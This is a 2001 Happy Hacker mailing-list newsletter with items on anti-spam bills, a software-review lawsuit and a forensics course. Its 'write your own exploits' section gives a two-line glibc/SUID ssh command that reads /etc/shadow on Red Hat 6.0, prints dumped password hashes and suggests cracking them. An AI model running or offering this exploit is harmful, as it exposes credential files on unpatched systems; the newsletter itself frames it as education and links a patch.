Message 18 of 32 | Previous | Next [ Up Thread ] Message Index Msg # From: cmeinel@t... Date: Wed May 9, 2001 10:32 am Subject: News from Happy Hacker Inside Happy Hacker Jan. 19, 2001 ___________________________________________________________ See the Happy Hacker web site at http://www.happyhacker.org. Firewall or web babysitter program blocks you? Try http://happyhacker.org. Still doesn't work? Try entering 206.62.52.30 in the location window of your web browser. Inside this issue: * New at the Happy Hacker web site * Anti-spam laws under consideration * PC Help site under attack by greedy computer security company * Windows forensics course * Write your own exploits *** New at the Happy Hacker web site: * Tired of all those kiddie haxors trying to break into your home computer? Keep them out and give them a hard time with help available at http://happyhacker.org/HHA/ * Are elements of the computer security industry running a protection racket? Check out http://happyhacker.org/HHA/cult1.shtml * The "It sucks to be me" section is getting input from major league criminals nowadays. We say the bigger they are, the harder they are going to fall, heh, heh... http://happyhacker.org/sucks/ * Want to be a hero on the cyberspace frontier? Go here for links on what groups rock and which groups suck. http://happyhakcer.org/defend/vigilante.shtml *** Anti-spam laws under consideration Getting tired of all that spam? Some folks think there ought to be a law. H.R. 1017: The Anti-Spam Act of 2001 http://thomas.loc.gov/cgi-bin/bdquery/z?d107:h.r.01017: S.630: CAN SPAM Act of 2001 http://thomas.loc.gov/cgi-bin/bdquery/z?d107:s.00630: *** PC Help site under attack by greedy computer security company For many years Keith Little has run a free help site for PC users, http://www.nwinternet.com/~pchelp/index.html. One of his services is to review products. For example, Little reports that Lockdown 2000 sucks. Now the owner of the company that sells Lockdown,Michael Paris, is suing Little. If you think that people should be free to write about software on their web sites, even if we discover that software sucks, you may consider contributing money to the defense fund for Keith Little. To read more about it, see http://Pchelpers.org defense fund *** Windows forensics course I (Carolyn Meinel) took the course "E-Forensics: A Clinic in Systems Security Practices" at the University of Texas at Austin in January. The course is awesome! I learned how to hide data in the weirdest places and how to hex edit command.com so that, for example, the "dir" command would do something totally different, for example "deltree", muhahah... The instructors are upstanding citizens who just happen to be serious hackers. I mean, if they can teach me things I never even dreamed of doing... May 21 - 25, 2001 Presented by: Dan Mares of Mares and Company, LLC & Larry Leibrock, PhD, Dean for Technology of the McCombs School of Business, UT Austin For more information, see http://bevo2.bus.utexas.edu/ctec/forensics/ *** Write your own exploits Back last January, Greggory Peck and Bill Marchand were kinda wondering about reports of an exploit in glibc (a library that is used by the C compiler. Here's how the security alert at http://securityfocus.com described it: "Upon execution of SUID and SGID applications, the library allows a user to preload libraries in the environment variable LD_PRELOAD providing the variable does not contain forward slashes. A special check is also performed to ensure the library being preloaded is SUID. However, if the library is found in the /etc/ld.so.cache file, this check is circumvented, and never performed. It is therefore possible to load a library from /lib or /usr/lib prior to the execution of a SUID or SGID program. This flaw makes it possible for a user with malicious motives to create files in restricted locations, or overwrite files outside of the access of this user, including system files." What this means is you could use glibc to overwrite the password files to add yourself as a user with root privileges. However, no exploit program was provided along with this alert to prove this could be done. Instead of waiting for someone to hand a glibc exploit program them, Greggory and Bill wrote their own. Now I'm not about to give you a program to make your own root accounts on the million or so vulnerable computers still on the Internet. (Need to fix your Linux box? Upgrade to a non-vulnerable glibc at ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/glibc-2.1.3- 27.src.rpm). Do you want to figure out how to write this exploit yourself? Greggory gave me a simple, two-line exploit that falls one step short of taking over a victim computer. From what this exploit shows, you may be able to figure out how to write a much more powerful one. [carolyn@g... carolyn]$ export RESOLV_HOST_CONF=/etc/shadow [carolyn@g... carolyn]$ ssh unixhq.org /etc/shadow: line 1: bad command `root:$1 $R94aFIrb$yg3.fZX3FIDEPNGI6XhFi.:11345:0:99999:7:::134537380' `fooagency:$1 $Ai09/Mfg$6dL1.znVoEjYzEaH4/7jE1:11035::99999::0::135521068' /etc/shadow: line 25: bad command `netfubblywood:$1 $p32k1k4Y$QivfvBAzhvQBGBe100uy31:11022::99999::0::135595996' /etc/shadow: line 26: bad command `fezfoo:$1 $UDOsz5ul$Wq1GAtI0yVCQPKddPdX.z0:11279::99999::0::135722004' /etc/shadow: line 27: bad command `administrivia:$1 $hh.PfQ7O$j9ieAgBn26sDdmklcnr3t0:11367::99999::::134537732' /etc/shadow: line 28: bad command `embezzlement:$1 $XGRgvTOH$uDTKnjVYlviKI5T0.PWTc1:11035::99999::::135630316' /etc/shadow: line 29: bad command `charlieroot:$1 $Up5CJvzV$iraAkrXd199e9x1HE0pqp/:10870::99999::::135437276' /etc/shadow: line 30: bad command `fubmann:$1 $IYMWht1r$Z02PJVIVsR1aZbyATgXkb0:10893::99999::::135483348' /etc/shadow: line 31: bad command `yana:$1 $bJ7a9LOR$Ct57BRRl8DJxWXHM9L347/:11009::99999::::135623820' /etc/shadow: line 32: bad command `dreamfubar:$1 $UGlXUINz$br7XLwRYZqa8784Lel7g/1:10928::99999::::134537804' /etc/shadow: line 33: bad command `jdfubbly:$1 $Hl1VU8fq$qJFCcEXwHqbhyYdUG02oH/:11212::99999::::135713404' /etc/shadow: line 34: bad command `a-no-ne:$1$WoMDMG02 $AL5mnLfJIuBJ4tdDzuGjm0:10927::99999::::135517804' /etc/shadow: line 35: bad command `ajcrosefubarino:$1 $WA.j1NbH$Uz7m8D.13T5KORkYOGl80/:10927::99999::::135508124' How does it work? In this case, I was trying it on an out-of-the-box Red Hat 6.0 box. I won't guarantee it works on anything else. (For example, on another box ssh might not be SUID.) In this case I was logged in as an unprivileged user. 1) The first line uses the export command to associate "RESOLV_HOST_CONF" with the /etc/shadow file, which contains encrypted passwords. Normally as an unprivileged user I can't read this file. 2) The second line is the command to run the secure shell client program. In this situation it was set up to run as root (SUID). 3) Voila! Thanks to that export command, the contents of the file /etc/shadow are now being piped into the command "ssh". Of course we get lots of bad command messages, but that is irrelevant because what I really want is the contents of /etc/shadow . 4) Run the encrypted passwords through a cracking program. What else can you do with Red Hat 6.0 and its bad glibc? Greggory and Bill figured out this one by reasoning that a system call plus a program that runs with root privileges would make a nifty exploit. So they simply tried out a bunch of system commands and mixed and matched them with other cool stuff. So what does this tell us? If you want to create your own ways to break into computers, it helps to really, really understand the operating system you are attacking, and the programs that run on it. Anyhow, if you want to get a fast start, you can set up your own Linux box (you need glibc prior to version 2.1.3-27, so get some older version like Red Hat 6.0), study the manuals, and have fun! You can go to jail warning! If you figure this one out and go on a hacking rampage and get caught, the judge will not let you off just because the owners of the victim computers were too dumb to upgrade glibc. ___________________________________________________________________ This is a list devoted to *legal* hacking! If anyone plans to use any information in this Digest or at our Web site to commit crime, go away! We like to put computer criminals behind bars where they belong! Unix editor Mike Miller unixeditor@t...; Windows editor Greggory Peck wineditor@t... Mac editor Pat St. Arnaud, maceditor@t... Network editor neteditor@t... Clown Princess: Carolyn Meinel cmeinel@t... Happy Hacker, Inc. is part of a 501 (c) (3) tax deductible organization ___________________________________________________________________